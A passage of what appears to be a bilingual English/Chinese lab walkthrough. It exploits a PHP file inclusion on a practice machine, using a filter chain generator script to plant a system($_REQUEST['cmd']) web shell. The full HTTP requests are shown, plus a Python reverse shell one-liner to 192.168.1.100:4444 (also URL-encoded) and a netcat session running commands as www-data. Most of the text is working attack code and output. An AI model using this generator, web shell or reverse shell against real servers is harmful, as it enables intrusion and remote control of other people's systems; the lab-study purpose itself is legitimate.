# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in encoded_chain[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
if not debug_base64:
# don't add the decode while debugging chains
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
return final_payload
def main():
# Parsing command line arguments
parser = argparse.ArgumentParser(description="PHP filter chain generator.")
parser.add_argument("--chain", help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)", required=False)
parser.add_argument("--rawbase64", help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.", required=False)
args = parser.parse_args()
if args.chain is not None:
chain = args.chain.encode('utf-8')
base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
chain = generate_filter_chain(base64_value)
print("[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain, base64_value))
print(chain)
if args.rawbase64 is not None:
rawbase64 = args.rawbase64.replace("=", "")
match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
if (match):
chain = generate_filter_chain(rawbase64, True)
print(chain)
else:
print ("[-] Base64 string required.")
exit(1)
if __name__ == "__main__":
main()Use the tool to create a php filter chain with <?php system($_REQUEST[“cmd”]);?> as payload.
使用该工具创建一个 php 过滤器链,其中 <?php system($_REQUEST[“cmd”]);?> 作为有效负载。
$ python3 php_filter_chain_generator.py --chain '<?php system($_REQUEST["cmd"]);?>'
[+] The following gadget chain will generate the following code : <?php system($_REQUEST["cmd"]);?> (base64 value: PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://tempRun the command “whoami” as a test. It worked and “www-data” was displayed in the response.
运行命令“whoami”作为测试。它起作用了,响应中显示了“www-data”。
Request: 请求:
GET /include.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&Submit=Submit&cmd=whoami HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.4/
Connection: close
Upgrade-Insecure-Requests: 1
Response: 响应:
HTTP/1.1 200 OK
Date: Sat, 28 Oct 2023 19:56:45 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 249
Connection: close
Content-Type: text/html; charset=UTF-8
www-data
$)C@CàÐÐø
Since we can execute arbitrary commands, we can create a reverse shlle.
由于我们可以执行任意命令,因此我们可以创建一个反向 shlle。
I ran a code to create a reverse shell using simple python3.
我运行了一个代码来使用简单的 python3 创建一个反向 shell。
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'Pass the URL-encoded python3 reverse shell code to cmd and run it.
将 URL 编码的 python3 反向 shell 代码传递给 cmd 并运行它。
%70%79%74%68%6f%6e%33%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%31%2e%31%30%30%22%2c%34%34%34%34%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%69%6d%70%6f%72%74%20%70%74%79%3b%20%70%74%79%2e%73%70%61%77%6e%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%27Requset: 要求:
GET /include.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&Submit=Submit&cmd=%70%79%74%68%6f%6e%33%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%31%2e%31%30%30%22%2c%34%34%34%34%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%69%6d%70%6f%72%74%20%70%74%79%3b%20%70%74%79%2e%73%70%61%77%6e%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%27 HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.4/
Connection: close
Upgrade-Insecure-Requests: 1
It worked and I got the www-data shell.
它起作用了,我得到了 www-data shell。
$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from (UNKNOWN) [192.168.1.4] 33804
www-data@offsec-4-diveintoive:/var/www/html$ whoami
whoami
www-data
www-data@offsec-4-diveintoive:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@offsec-4-diveintoive:/var/www/html$ cat /etc/hostname
cat /etc/hostname
offsec-4-diveintoive
www-data@offsec-4-diveintoive:/var/www/html$ ip a
ip a
